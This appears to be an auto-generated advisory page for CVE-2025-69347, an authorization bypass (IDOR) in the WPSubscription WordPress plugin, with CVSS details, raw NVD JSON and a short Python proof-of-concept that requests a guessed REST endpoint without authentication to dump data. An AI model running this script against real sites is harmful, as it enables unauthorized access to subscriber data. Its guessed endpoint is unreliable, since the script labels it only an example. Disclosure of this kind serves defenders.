Security Vulnerability Report
中文
CVE-2025-69347 CVSS 8.6 HIGH

CVE-2025-69347

Published: 2026-03-25 17:16:28
Last Modified: 2026-04-27 21:16:25

Description

Authorization Bypass Through User-Controlled Key vulnerability in Convers Lab WPSubscription subscription allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPSubscription: from n/a through <= 1.8.10.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WPSubscription <= 1.8.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL example, replace with actual vulnerable endpoint target_url = "http://target-wordpress-site/wp-json/wps/v1/subscription/{user_controlled_key}" # The vulnerability allows bypassing authorization by manipulating the key parameter # Exploit: Iterate through predictable keys or use disclosed keys to access data payload_key = "1" # Example of a user-controlled key that might expose data try: # Send request without authentication headers (PR:N) response = requests.get(target_url.format(user_controlled_key=payload_key)) if response.status_code == 200: print("[+] Exploit Successful! Authorization Bypassed.") print("[+] Leaked Data:") print(response.text) else: print("[-] Exploit failed or key invalid.") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69347", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:27.690", "lastModified": "2026-04-27T21:16:24.803", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Convers Lab WPSubscription subscription allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPSubscription: from n/a through <= 1.8.10."}, {"lang": "es", "value": "Elusión de autorización a través de vulnerabilidad de clave controlada por el usuario en la suscripción de Convers Lab WPSubscription permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WPSubscription: desde n/a hasta &lt;= 1.8.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/subscription/vulnerability/wordpress-wpsubscription-plugin-1-8-10-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}